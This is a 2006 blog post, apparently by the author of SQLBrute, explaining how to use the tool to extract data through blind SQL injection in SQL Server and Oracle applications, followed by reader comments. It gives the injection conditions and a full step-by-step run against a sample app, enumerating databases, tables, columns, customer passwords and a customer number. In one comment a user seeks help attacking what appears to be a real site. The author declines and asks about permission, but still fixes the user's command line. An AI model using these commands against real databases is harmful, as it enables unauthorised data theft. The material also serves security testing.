Friday, 17 March 2006

Using SQLBrute to brute force data from a blind SQL injection point

Update - An update to SQLBrute (version 1.0) has been released (including a Windows binary version). This is probably going to be the final version in Python - I've started rewriting the tool as a Windows GUI application in .NET, so look forward to a point-and-brute-force version soon.

Since SQLBrute has been linked to from the Oedipus Web Scanner as a possible exploit tool, I thought I might write some basic usage notes for it... especially since the tool is not at all idiot proof...as evidenced by the fact that I sometimes have trouble running it.

SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn't require non-standard libraries (there is some code in there for pycurl, but it is disabled because it isn't finished).

For error based SQL injection, SQLBrute should work, if you can either:
  • Get an identifiable difference between adding the exploit strings AND 1=1 and AND 1=2 to your SQL injection point (usually works if the query is normally valid)
  • Get an identifiable difference between adding the exploit strings OR 1=1 and OR 1=2 to your SQL injection point (usually works if the query is normally invalid)
For time based SQL injection, SQLBrute should work if you can use exploit syntax similar to ;waitfor delay '0:0:5' to generate a time delay in Microsoft SQL Server.

Here is the options printed from SQLBrute when you run it with no options:

SQL command line options

___  _____  __    ____  ____  __  __  ____  ____
/ __)(  _  )(  )  (  _ \(  _ \(  )(  )(_  _)( ___)
\__ \ )(_)(  )(__  ) _ < )   / )(__)(   )(   )__)
(___/(___/\\(____)(____/(_)\_)(______) (__) (____)

Usage: ./sqlbrute.py options url
[--help|-h]
[--verbose|-v]
[--server|-d oracle|sqlserver]
[--error|-e regex]
[--threads|-s number]
[--cookie|-k string]
[--time|-n]
[--data|-p string]
[--database|-f database]
[--table|-t table]
[--column|-c column]
[--where|-w column=data]
[--header|-x header::val]

The only required command line option is the URL. If the vulnerable parameter is on the URL (i.e. in the querystring), that parameter needs to be on the end of the URL and in a format that SQL can be added on the end (i.e. param=foo' is sufficient in a lot of cases).

If the vulnerable parameter is in the POST data, you need to specify a --data option (see below), and have the vulnerable parameter at the end (as for a URL parameter, including a single quote or whatever is needed for the SQL injection point). The tool assumes that it can terminate the SQL using --, and also assumes that you're not going to be exploiting querystring variables on a POST.

Several of the options are for including required information in the requests to the server. You may need to wrap arguments in double quotes because of spaces and special characters in the data:
  • --data allows you to specify POST data for a form post. Takes a string containing all the data as an argument
  • --cookie allows you to specify the cookies to be supplied. Takes a string containing all the cookies as an argument
  • --header allows you to specify arbitrary HTTP headers to include in the request (e.g. Accepts headers or similar). The header name and value need to be supplied as a single argument of the form header::value
Other options modify the default behaviour of the tool:
  • --server forces the tool to use Oracle or SQL Server exploit techniques. This is needed because the tool defaults to SQL Server, and won't intelligently detect that Oracle is in use
  • --threads specifies how many worker threads the tool will use to send requests. This defaults to 5, however this should be reduced if you are getting unreliable results (especially when doing time based testing). Setting this too high has a tendency to max the CPU on your machine, and have bad effects on the machine you're testing
  • --time forces the tool to use time based testing instead of error based testing
  • --verbose turns on verbose output. By default the tool doesn't output anything until it has completely enumerated an entry, which can lead to wondering whether it is actually doing anything. Using verbose once will output preliminary results - allowing you to see that its working. Using verbose twice will output requests and responses to allow debug issues with the tool
  • --output allows us to specify an output file for the results. Otherwise the only results we will get will be to stdout
The remainder of the options specify the data to be brute forced from the database:
  • --error specifies a regular expression to look for that appears in one of the AND or OR cases noted above. Usually this will be something identifiable such as an error message, or a message noting that no results were found
  • --database (SQL Server only) specifies what database to use for enumerating data
  • --table specifies what table to use for enumerating data
  • --column specifies what column to use for enumerating data
  • --where allows us to filter what data to brute force out by specifying a WHERE clause when enumerating a column. The where data must be in the form column_name=data (i.e. WHERE foo=bar)
The tool is designed to be used in a logical progression:
  • Running the tool without specifying a database, table, or column parameter will enumerate the list of databases for SQL Server, and the list of user tables for Oracle
  • Running the tool with the name of a database (SQL Server only) will enumerate the list of tables
  • Running the tool with a table parameter (plus database parameter for SQL Server) will enumerate the columns in that table
  • Running the tool with a column parameter (with table and database parameters if applicable) will enumerate the data in that column of that parameter. You can then find matching values in other columns of the table through using a --where command line option
And here is an example of enumeration from beginning to end on a sample application to see how this all works. In this example there is a SQL injection error in this ASP/SQL Server application on the locator.asp page. This is exploited through a POST, and the vulnerable parameter is the county parameter:

Enumerating databases

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last
response comes in.
Found: msdb
Found: pubs
Found: model
Found: tempdb
Found: master
Found: webapp

Enumerating tables

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp \
http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last
response comes in.
Found: myview
Found: locator
Found: customer
Found: postings
Found: responses
Found: dtproperties
Found: fresh_postings
Found: fresh_responses

Enumerating columns

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last
response comes in.
Found: city
Found: email
Found: lname
Found: fname
Found: mname
Found: phone
Found: endbal
Found: county
Found: begbal
Found: address
Found: custnum
Found: deposits
Found: password
Found: postcode
Found: withdrawals

Enumerating passwords

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column password http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last
response comes in.
Found: dog
Found: test
Found: hawk
Found: loki
Found: fish
Found: buzz

<Control-C hit at this point>

Enumerating the customer number for a specific password

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column custnum --where password=dog \
http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last
response comes in.
Found: 1.036512520000000e+008

Note in the above example, the customer number is numeric. Due to the conversion used in the tool, it is shown in scientific notation (i.e. it is actually 103651252).

And we're done. Enjoy!

18 comments:

  1. Keep up the great work on your blog. Best wishes WaltDe

    ReplyDelete
  2. in other case, i used perl to create sql injection tools, and i think i do not need
    to brute force the target, coz we just need
    the right query to steal any data from database,
    see my blog below for example demos :
    iko94.blogspot.com

    ReplyDelete
  3. Awesome tool Justin! Is there any tool that can perform this style of attacks for web services? I couldn't find any...so I've started writing one myself! ;)
    -Rajat.

    ReplyDelete
  4. hii this is a nice tool

    ReplyDelete
  5. really nice one... gonna test it :) good job btw...
    Cizarr

    ReplyDelete
  6. How do i run it?

    ReplyDelete
  7. It's a command line tool - you run it from the command interpreter (cmd.exe) in Windows, or the shell in Unix (sh, bash, ksh whatever).

    ReplyDelete
  8. I tried it, but it does not seem working !!

    ReplyDelete
  9. great work , thank you man .

    ReplyDelete
  10. hello justin clark, I have a problem using your tool in a secure page (https) would like to know if you have support for these pages and as I do the injections?

    ReplyDelete
  11. Justin Clarke20 June 2008 14:31

    If your python distribution supports SSL, SQLBrute supports SSL. This is easier to do on Linux - you just need to install the SSL support for python. On Windows, this is a lot harder.
    What python distro are you using? Or, are you using the compiled version? If using the compiled version, it doesn't have SSL support compiled in.

    ReplyDelete
  12. hey can u please help me to find out the tables form this one ?
    python sqlbrute.py --threads 1 --output x.txt --database <deleted> http://<deleted>/ver.php?id=32849%20AND%201=1-
    pretty please and thanks ... im waiting for an email from you!

    ReplyDelete
  13. Hello,
    I'm not sure I understand the concept: it brute forces every piece of information that it want to extract from the database?
    But it must take weeks to retreive a single name. Is it a real threat for a website?

    ReplyDelete
  14. It actually only takes a few minutes in most cases, so yes - this is a very real threat to a website.

    ReplyDelete
  15. (for comment three above this one)
    Err, no - can't help. And I hope you have permission for testing that site?
    You do seem to be using the tool incorrectly - you should have more luck with this command line :-
    python sqlbrute.py --threads 1 --output x.txt --database <deleted> http://<deleted>/ver.php?id=32849

    ReplyDelete
  16. Is there any way to invert the --error option such that you provide a regex for success? (Because an error produces no additional output while success produces the record requested)?

    ReplyDelete
  17. Justin Clarke24 April 2009 23:21

    Hmm, by default no - the regex is matched for the error. You might try a negative assertion regex instead of a normal one (i.e. match where a value is _not_ present in the error value) - that should allow you to match the success (i.e. value is present, no match) but not the error (value isn't present, match).

    ReplyDelete
  18. All I can say is wow. Awesome work, still helpful in 2010 for me :)

    I had to modify it slightly for my case ;)

    ReplyDelete